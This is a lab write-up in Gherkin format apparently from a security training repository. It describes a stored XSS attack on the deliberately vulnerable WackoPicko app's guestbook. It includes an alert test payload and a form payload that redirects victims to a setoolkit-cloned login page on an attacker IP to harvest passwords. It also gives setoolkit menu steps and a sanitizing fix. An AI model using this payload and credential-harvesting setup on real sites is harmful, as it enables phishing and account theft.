## Version 1.4.1
## language: en

Feature:
  """
  Wackopicko is a site to upload ,  buy and comment images of other users.
  In this ToE I describe how to attack the xss vulnerability in the message box.
  Redirecting the page and obtaining the users and password of other users
  through setoolkit. finally I repair the vulnerability with a character filter
  """
  TOE:
    WackoPicko
  Category:
    Cross-site Scripting
  Location:
    /guestbook.php - comment (field)
  CWE:
    CWE-0079: Improper Neutralization of Input During Web Page Generation
    ('Cross-site Scripting') -base-
      https://cwe.mitre.org/data/definitions/79.html
    CWE-0074: Improper Neutralization of Special Elements in Output
    Used by a Downstream Component('Injection') -class-
      https://cwe.mitre.org/data/definitions/74.html
    CWE-0990: SFP Secondary Cluster: Tainted Input to Command -category-
      https://cwe.mitre.org/data/definitions/990.html
  CAPEC:
    CAPEC-0592: Stored XSS -detailed-
      https://capec.mitre.org/data/definitions/592.html
    CAPEC-0063: Cross-Site Scripting (XSS) -standard-
      https://capec.mitre.org/data/definitions/63.html
    CAPEC-0242: Code Injection -meta-
      https://capec.mitre.org/data/definitions/242.html
  Rule:
    REQ.173: Discard unsafe inputs
      https://fluidattacks.com/web/en/rules/173/
  Goal:
    Obtaining username and password through phishing using XSS
  Recommendation:
    Protect the POST's variables or use caracter filter

  Background:
  Hacker's software:
    | <Software name>     | <Version>   |
    | Firefox             | 64.0        |
    | WackoPicko          | 1.4.0       |
    | setoolkit           | 7.7.9       |

  TOE information:
    Given I enter the site http://localhost:8080
    And I can buy, upload and share images on the site
    And the server is runing MySQL version >=5
    And PHP version 5.5.9
    And apache version 2.4.7
    And is running on Docker image (adamdoupe/wackopicko) on parrot OS 4.2.2x64

  Scenario: Normal use case
  Buying and uploading images
    Given I access the site "http://localhost:8080/guestbook.php"
    Then I can comment
    And I can shared link
    And I can click on links shared by others users
    And I can comment images and send comment

  Scenario: Static detection
  The message box does not have a character filter
  XSS can run in the message box
    When I open the file guestbook.php on "/var/www/html/include"
    Then I see the next code:

    """
    27 function add_guestbook($name, $comment, $vuln = False)
    28 {
    29   if ($vuln)
    30  {
    31      $query = sprintf("INSERT INTO `guestbook` (`id`, `name`, `comment`,
            `created_on`) VALUES (NULL, '%s', '%s', NOW());",
    32                       $name,
    33                       mysql_real_escape_string($comment));
    34   }
    35   else
    36       {
    37      $query = sprintf("INSERT INTO `guestbook` (`id`, `name`, `comment`,
            `created_on`) VALUES (NULL, '%s', '%s', NOW());",
    38                       mysql_real_escape_string($name),
    39                       mysql_real_escape_string($comment));
    40       }
    41       return mysql_query($query);
    42    }
    43 }
    44 ?>
    """

    And I see that code no has sanitize filter

  Scenario: Dynamic detection
  sharing comments with other users
    Given I access the site "http://localhost:8080/guestbook.php"
    Then I see that site can be vulnerable because when I put
    #<script>alert(1)</script>  in the comment box
    And I put a name
    And I click on submit
    Then the XSS-popup appear
    And I see that the page in this URL is vulnerable to XSS attacks

  Scenario: Exploitation
  getting user and password from user login page
  #http://localhost:8080/users/login.php
    Given I open the tool setoolkit
    And I configure seetoolkit
    """
    1. I select "1) Social-Engineering Attacks"
    2. I select "2) Website Attack Vectors"
    3. I select "3) Credential Harvester Attack Method"
    4. I select "2) Site Cloner"
    5. I define the ip "192.168.0.13"
    6. I enter the URL to clone "http://localhost:8080/users/login.php"
    """
    And the page is cloned
    And I upload the page to "192.168.0.13"
    Then I access to "http://localhost:8080/guestbook.php"
    And I put the comment

    #<form method=post action="//localhost:8080/guestbook.php"
    #onclick=elements[0].value=outerHTML;submit()>
    #<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://192.168.0.13">
    #<input type=hidden name=comment>click aqui</form>

    And I put name and click on submit
    Then the message is grabed in the page
    And the other users click on "click aqui"
    Then they are redirect to my page. See imagen.png
    And I capture the user and password on the console setoolkit

  Scenario: Remediation
  The server WackoPicko has a XSS vulnerability on
  #http://localhost:8080/guestbook.php in the comment box
    Given this I advise to repair the vulnerability adding this line on
    #include/guestbook.php:

    #4 $_POST  = filter_input_array(INPUT_POST, FILTER_SANITIZE_STRING);
    Then I can confirm that the vulnerability can be successfully patched.
    #See imagen1.png

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    5.0/10 (Medium) - AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    4.7/10 (Medium) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    3.3/10 (Low) - CR:L/IR:L/AR:L/

  Scenario: Correlations
    No correlations have been found to this date 2018-12-31
